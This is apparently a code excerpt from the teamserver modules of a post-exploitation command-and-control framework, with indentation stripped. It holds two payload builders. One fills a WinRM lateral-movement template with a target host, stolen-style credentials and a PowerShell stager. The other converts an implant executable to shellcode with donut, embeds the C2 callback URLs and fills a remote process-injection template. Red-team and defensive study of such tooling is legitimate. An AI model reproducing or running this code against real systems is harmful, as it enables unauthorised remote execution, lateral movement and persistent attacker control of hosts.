def payload(self):
stager = ipc_server.publish_event(events.GET_STAGERS, ('powershell', ))
listener = ipc_server.publish_event(
events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if stager and listener:
stager.options['AsFunction']['Value'] = False
with open('core/teamserver/modules/boo/src/winrm.boo',
'r') as module_src:
guid, psk, stage = stager.generate(listener)
ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
src = module_src.read()
src = src.replace('TARGET', self.options['Host']['Value'])
src = src.replace('USERNAME',
self.options['Username']['Value'])
src = src.replace('DOMAIN', self.options['Domain']['Value'])
src = src.replace('PASSWORD',
self.options['Password']['Value'])
src = src.replace(
'TRUSTED_HOSTS',
str(self.options['AddToTrustedHosts']['Value']).lower())
src = src.replace('PAYLOAD', f'`{stage}`')
return src
print_bad('Invalid listener selected')
def payload(self):
listener = ipc_server.publish_event(
events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if listener:
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
ipc_server.publish_event(events.SESSION_REGISTER, (guid, psk))
donut_shellcode = donut.create(
file='./core/teamserver/data/naga.exe',
params=f"{guid};{psk};{c2_urls}",
arch=2
if self.options['Architecture']['Value'] == 'x64' else 1)
shellcode = shellcode_to_int_byte_array(donut_shellcode)
#if self.options['InjectionMethod']['Value'] == 'InjectRemote':
with open('core/teamserver/modules/boo/src/injectremote.boo',
'r') as module_src:
src = module_src.read()
src = src.replace('BYTES', shellcode)
src = src.replace('PROCESS', self.options['Process']['Value'])
return src
else:
print_bad(
f"Listener '{self.options['Listener']['Value']}' not found!")
def run(self, guids):
for guid in guids:
ipc_server.publish_event(events.NEW_JOB, (guid, Job(module=self.selected)))
